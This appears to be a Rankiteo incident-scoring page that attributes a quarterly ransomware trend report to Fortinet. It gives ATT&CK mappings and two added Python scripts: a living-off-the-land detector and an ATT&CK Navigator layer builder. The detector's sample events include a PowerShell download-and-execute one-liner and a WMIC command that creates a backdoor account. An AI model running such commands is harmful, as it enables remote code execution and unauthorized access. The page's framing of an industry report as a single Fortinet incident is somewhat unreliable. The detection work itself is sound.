Incident Score: Analysis & Impact (FORSON1776335417)
The details of an individual company incident or report give you a full view of the event from every side.
Rankiteo Score Impact Analysis
Key Highlights From The Incident Analysis
- Timeline of the FortiOS/FortiProxy vulnerability exploitation and the lateral movement that followed inside the affected environment.
- Overview of the affected data sets (personally identifiable information) and why they materially increase incident severity.
- How Rankiteo's incident engine converts technical details into a normalized incident score.
- How this cyber incident affects Fortinet's Rankiteo cyber score and cyber rating.
- Rankiteo’s MITRE ATT&CK correlation analysis for this incident, with associated confidence level.
Full Incident Analysis Transcript
In this Rankiteo incident briefing, we review the incident recorded against Fortinet under incident ID FORSON1776335417.
The analysis begins with an overview of Fortinet's company profile: the LinkedIn page https://www.linkedin.com/company/fortinet with 1,232,151 followers, the industry type Computer and Network Security, and a headcount of 15,789 employees.
The briefing then explains how Rankiteo's incident engine converts technical details into a normalized incident score. Fortinet's score was 293 before the incident and 289 after it, a difference of -4, which serves as an indicator of the incident's severity and impact.
In the next step of the briefing, we analyze the incident in more detail and the impact it had on Fortinet and its customers.
On 01 April 2026, a cybersecurity incident titled "Ransomware Activity Stabilizes at Elevated Levels in Q1 2026, Shifting Tactics and Targets" came to light.
The first quarter of 2026 marked a period of sustained ransomware activity, with attack volumes remaining steady compared to both the previous quarter and the same period in 2025.
The disruption is felt across the environment, affecting FortiOS/FortiProxy, SonicWall SSL VPN and the OpenClaw AI skills marketplace. It involves data theft and extortion, putting personally identifiable information (PII) at risk, with an estimated financial loss of more than $66 million attributed to Scattered LAPSUS$ Hunters since 2022.
Formal response steps have not been shared publicly yet.
The case is still ongoing, and teams are taking away lessons such as:
- Ransomware groups are shifting toward extortion-only attacks, reducing their reliance on encryption.
- Emerging threats include AI supply chain attacks and exploitation of unpatched vulnerabilities in SMBs.
- Geographic and sector targeting is expanding to developing economies and to industries with weaker defenses.
Recommended next steps include:
- Patch known vulnerabilities (e.g., FortiOS/FortiProxy, SonicWall SSL VPN) immediately.
- Enhance monitoring for living-off-the-land tools (PowerShell, PsExec, WMI).
- Implement stricter vetting for third-party AI skills and automation tools.
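The second recommendation above, enhanced monitoring for living-off-the-land tools, is the one most teams can act on the same day. The following is an added example, not Rankiteo's or Fortinet's code, of detection logic that scans Windows process-creation (4688) and service-installation (7045) records for PowerShell encoded commands, WMI remote process creation and PsExec service execution, and tags each hit with the ATT&CK technique ID used in the correlation analysis below on this page (T1059.001, T1047, T1569.002). The event records are constructed, and the field names, hostnames, users and payload are assumptions.

```python
"""Added example (not Rankiteo's or Fortinet's code): flag living-off-the-land
activity in Windows event records and map each hit to the ATT&CK technique IDs
used in this page's correlation analysis (PowerShell T1059.001, WMI T1047,
PsExec service execution T1569.002). The event records below are constructed
and the field names are assumptions modelled on Security log 4688/7045 events."""
import base64
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int            # 4688 = process creation, 7045 = service installed
    host: str
    user: str
    image: str = ""          # full path of the created process
    parent: str = ""         # full path of the parent process
    cmdline: str = ""
    service_name: str = ""   # 7045 only
    service_path: str = ""   # 7045 only


@dataclass
class Hit:
    host: str
    user: str
    technique: str
    reason: str


# -EncodedCommand and its abbreviations, followed by a base64 blob
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_PS = ("downloadstring", "iex", "invoke-expression", "frombase64string",
                 "-nop", "bypass", "-w hidden")
WMIC_CREATE = re.compile(r"process\s+call\s+create", re.I)


def decode_powershell(cmdline: str) -> str:
    """Return the decoded script for -EncodedCommand invocations, else the cmdline."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        # PowerShell encodes the script as UTF-16LE before base64
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return cmdline


def analyze(ev: Event) -> list:
    """Apply every LOLBin rule to one event and return the matching Hits."""
    hits = []
    image, parent = ev.image.lower(), ev.parent.lower()
    if ev.event_id == 7045:
        if "psexesvc" in (ev.service_name + ev.service_path).lower():
            hits.append(Hit(ev.host, ev.user, "T1569.002",
                            f"PsExec service installed: {ev.service_name}"))
        return hits
    if ev.event_id != 4688:
        return hits
    if image.endswith(("powershell.exe", "pwsh.exe")):
        script = decode_powershell(ev.cmdline)
        flags = [k for k in SUSPICIOUS_PS if k in script.lower()]
        if flags or script != ev.cmdline:   # any encoded command is worth a look
            hits.append(Hit(ev.host, ev.user, "T1059.001",
                            f"suspicious PowerShell ({', '.join(flags) or 'encoded'}): {script[:60]}"))
    if image.endswith("wmic.exe") and WMIC_CREATE.search(ev.cmdline):
        hits.append(Hit(ev.host, ev.user, "T1047", f"WMI remote process creation: {ev.cmdline[:60]}"))
    if parent.endswith("wmiprvse.exe") and image.endswith(("cmd.exe", "powershell.exe", "pwsh.exe")):
        hits.append(Hit(ev.host, ev.user, "T1047", "shell spawned by the WMI provider host"))
    if parent.endswith("psexesvc.exe"):
        hits.append(Hit(ev.host, ev.user, "T1569.002", "process spawned by the PsExec service"))
    return hits


def run(events) -> list:
    return [h for ev in events for h in analyze(ev)]


def summarize(hits) -> dict:
    """Technique ID -> number of hits, in the page's ATT&CK ID notation."""
    return dict(Counter(h.technique for h in hits))


# Constructed sample events (hostnames, users and payload are made up).
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    Event(4688, "WS07", "CORP\\jdoe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", f"powershell.exe -nop -w hidden -enc {_ENCODED}"),
    Event(7045, "FS01", "SYSTEM", service_name="PSEXESVC", service_path=r"%SystemRoot%\PSEXESVC.exe"),
    Event(4688, "FS01", "CORP\\svc_backup", r"C:\Windows\System32\cmd.exe",
          r"C:\Windows\PSEXESVC.exe", "cmd.exe /c whoami"),
    Event(4688, "WS07", "CORP\\jdoe", r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe",
          'wmic /node:"DC01" process call create "cmd.exe /c net user backdoor P@ss /add"'),
    Event(4688, "DC01", "CORP\\jdoe", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
          "cmd.exe /c net user backdoor P@ss /add"),
    Event(4688, "WS07", "CORP\\jdoe", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for hit in run(SAMPLE_EVENTS):
        print(f"{hit.host:5} {hit.user:16} {hit.technique:10} {hit.reason}")
    print(summarize(run(SAMPLE_EVENTS)))
```

The rules are deliberately narrow so they can be run against a SIEM export without tuning first; in production, feed them from a parsed 4688/Sysmon 1 stream (with command-line auditing enabled, or none of the PowerShell and WMIC rules have anything to match) and suppress known administrative hosts per rule rather than globally.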
Finally, we map the incident to the MITRE ATT&CK framework to identify the tactics and techniques it correlates with.
The MITRE ATT&CK framework is a knowledge base of techniques and sub-techniques that are used to describe the tactics and procedures of cyber adversaries. It is a powerful tool for understanding the threat landscape and for developing effective defense strategies.
MITRE ATT&CK® Correlation Analysis
Rankiteo's analysis identified the following MITRE ATT&CK tactics and techniques for this incident, each with a confidence level based on the available evidence. Because the source is a quarterly ransomware report rather than a forensic account of a single intrusion, several evidence statements describe likely rather than confirmed behaviour, and the confidence levels should be read accordingly.
- Initial Access
  - Exploit Public-Facing Application (T1190), high confidence (90%): exploitation of vulnerabilities (CVE-2024-55591, SonicWall SSL VPN).
  - Drive-by Compromise (T1189), moderate to high confidence (70%): malicious AI skills delivered via the OpenClaw skills marketplace.
  - Phishing: Spearphishing Attachment (T1566.001), moderate confidence (50%): extortion-only attacks may involve phishing for initial access.
- Execution
  - Command and Scripting Interpreter: PowerShell (T1059.001), moderate to high confidence (80%): NightSpire relies on PowerShell to evade detection.
  - Windows Management Instrumentation (T1047), moderate to high confidence (80%): NightSpire uses WMI as a living-off-the-land tool.
  - System Services: Service Execution (T1569.002), moderate to high confidence (70%): PsExec used by NightSpire for lateral movement.
- Persistence
  - External Remote Services (T1133), moderate to high confidence (80%): exploitation of SonicWall SSL VPN vulnerabilities.
  - Server Software Component: Web Shell (T1505.003), moderate confidence (60%): unpatched FortiOS/FortiProxy may allow web shell deployment.
- Privilege Escalation
  - Exploitation for Privilege Escalation (T1068), moderate to high confidence (70%): unpatched vulnerabilities (CVE-2024-55591) may enable privilege escalation.
- Defense Evasion
  - Masquerading (T1036), moderate to high confidence (80%): malicious AI skills disguised as legitimate software.
  - Command and Scripting Interpreter: PowerShell (T1059.001), moderate to high confidence (80%): PowerShell used to evade detection (NightSpire).
  - Indicator Removal: File Deletion (T1070.004), moderate confidence (60%): living-off-the-land tools reduce forensic artifacts.
- Credential Access
  - Brute Force: Password Guessing (T1110.001), moderate confidence (60%): VPN vulnerabilities may enable credential brute-forcing.
  - Unsecured Credentials: Credentials In Files (T1552.001), moderate confidence (50%): SMBs with weaker defenses may store credentials insecurely.
- Discovery
  - Account Discovery: Domain Account (T1087.002), moderate to high confidence (70%): living-off-the-land tools (WMI, PowerShell) used for discovery.
  - Network Service Scanning (T1046), moderate to high confidence (70%): reconnaissance likely precedes exploitation of vulnerabilities.
- Lateral Movement
  - Remote Services: Remote Desktop Protocol (T1021.001), moderate confidence (60%): VPN exploitation may enable RDP-based lateral movement.
  - Lateral Tool Transfer (T1570), moderate to high confidence (70%): PsExec used by NightSpire for lateral movement.
- Collection
  - Data from Local System (T1005), high confidence (90%): data theft and extortion; PII and operational data compromised.
  - Data from Network Shared Drive (T1039), moderate to high confidence (70%): manufacturing and construction sectors may store data on shared drives.
- Command and Control
  - Application Layer Protocol: Web Protocols (T1071.001), moderate to high confidence (80%): ransomware groups likely use web protocols for C2.
  - Ingress Tool Transfer (T1105), moderate to high confidence (70%): living-off-the-land tools may download additional payloads.
- Exfiltration
  - Exfiltration Over C2 Channel (T1041), high confidence (90%): data exfiltration confirmed in extortion-only attacks.
  - Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002), moderate confidence (60%): ransomware groups may use cloud storage for exfiltration.
- Impact
  - Data Encrypted for Impact (T1486), moderate to high confidence (70%): partial data encryption in traditional ransomware attacks.
  - Inhibit System Recovery (T1490), moderate confidence (60%): ransomware may disable recovery mechanisms.
  - Data Manipulation (T1565), moderate confidence (50%): extortion-only attacks may involve data manipulation threats.
These correlations help security teams understand the attack chain and develop appropriate defensive measures based on the observed tactics and techniques.
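A correlation list like the one above is most useful when overlaid on the ATT&CK matrix next to existing detection coverage. The following is an added example, not Rankiteo's tooling, that takes the per-tactic technique IDs and confidence percentages from this page, merges techniques listed under more than one tactic (T1059.001 appears under both Execution and Defense Evasion), counts them by the page's confidence bands, and emits an ATT&CK Navigator layer with the confidence as the cell score. The technique rows are transcribed from the analysis above, with Data Manipulation under its enterprise-matrix ID T1565; the layer name, description, output file name and version strings are assumptions.

```python
"""Added example (not Rankiteo's tooling): turn the per-tactic technique list and
confidence levels from the correlation analysis on this page into an ATT&CK
Navigator layer. Technique rows are transcribed from the page; layer name,
description, output path and version strings are assumptions."""
import json

# (tactic, technique ID, confidence %) as stated in the correlation analysis
OBSERVED = [
    ("Initial Access", "T1190", 90), ("Initial Access", "T1189", 70), ("Initial Access", "T1566.001", 50),
    ("Execution", "T1059.001", 80), ("Execution", "T1047", 80), ("Execution", "T1569.002", 70),
    ("Persistence", "T1133", 80), ("Persistence", "T1505.003", 60),
    ("Privilege Escalation", "T1068", 70),
    ("Defense Evasion", "T1036", 80), ("Defense Evasion", "T1059.001", 80), ("Defense Evasion", "T1070.004", 60),
    ("Credential Access", "T1110.001", 60), ("Credential Access", "T1552.001", 50),
    ("Discovery", "T1087.002", 70), ("Discovery", "T1046", 70),
    ("Lateral Movement", "T1021.001", 60), ("Lateral Movement", "T1570", 70),
    ("Collection", "T1005", 90), ("Collection", "T1039", 70),
    ("Command and Control", "T1071.001", 80), ("Command and Control", "T1105", 70),
    ("Exfiltration", "T1041", 90), ("Exfiltration", "T1567.002", 60),
    ("Impact", "T1486", 70), ("Impact", "T1490", 60), ("Impact", "T1565", 50),
]


def band(confidence: int) -> str:
    """The page's wording for a confidence percentage."""
    if confidence >= 90:
        return "high"
    if confidence >= 70:
        return "moderate to high"
    return "moderate"


def merge_techniques(rows) -> dict:
    """One entry per technique ID, keeping the highest confidence and every tactic it was listed under."""
    merged = {}
    for tactic, tid, conf in rows:
        entry = merged.setdefault(tid, {"score": 0, "tactics": []})
        entry["score"] = max(entry["score"], conf)
        if tactic not in entry["tactics"]:
            entry["tactics"].append(tactic)
    return merged


def confidence_bands(rows) -> dict:
    """Number of distinct techniques in each confidence band."""
    counts = {"high": 0, "moderate to high": 0, "moderate": 0}
    for entry in merge_techniques(rows).values():
        counts[band(entry["score"])] += 1
    return counts


def build_layer(rows, min_confidence=0, name="FORSON1776335417 correlation") -> dict:
    """Navigator layer dict; techniques below min_confidence are left out."""
    techniques = []
    for tid, entry in sorted(merge_techniques(rows).items()):
        if entry["score"] < min_confidence:
            continue
        techniques.append({
            "techniqueID": tid,
            "score": entry["score"],
            "comment": f"{band(entry['score'])} confidence ({entry['score']}%); tactics: {', '.join(entry['tactics'])}",
            "enabled": True,
        })
    return {
        "name": name,
        "versions": {"layer": "4.5", "navigator": "5.1.0"},  # assumption: adjust to your Navigator build
        "domain": "enterprise-attack",
        "description": f"Techniques with confidence >= {min_confidence}% from the Rankiteo correlation analysis",
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0, "maxValue": 100},
        "techniques": techniques,
    }


if __name__ == "__main__":
    # Keep only the moderate-to-high and high entries; load the file via Navigator's "Open Existing Layer".
    layer = build_layer(OBSERVED, min_confidence=70)
    with open("forson1776335417_layer.json", "w") as fh:
        json.dump(layer, fh, indent=2)
    print(confidence_bands(OBSERVED), len(layer["techniques"]), "techniques written")
```

Raising the threshold to 70% drops the nine moderate-confidence techniques, which are the ones whose evidence is phrased as "may"; comparing the remaining 17 against your own detection layer in Navigator shows which correlated techniques have no rule behind them.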
Sources & References
- Fortinet Rankiteo Cyber Incident Details: https://www.rankiteo.com/company/fortinet/incident/FORSON1776335417
- Fortinet CyberSecurity Rating page: https://www.rankiteo.com/company/fortinet
- Fortinet Rankiteo Cyber Incident Blog Article: https://blog.rankiteo.com/forson1776335417-fortinet-sonicwall-vulnerability-january-2026/
- Fortinet CyberSecurity Score History: https://www.rankiteo.com/company/fortinet/history
- Fortinet CyberSecurity Incident Source: https://industrialcyber.co/reports/ransomware-reaches-elevated-new-normal-as-attack-volumes-hold-steady-into-2026-reshape-baseline-risk-expectations/
- Rankiteo A.I CyberSecurity Rating methodology: https://www.rankiteo.com/Images/rankiteo_algo.pdf
- Rankiteo TPRM Scoring methodology: https://static.rankiteo.com/model/rankiteo_tprm_methodology.pdf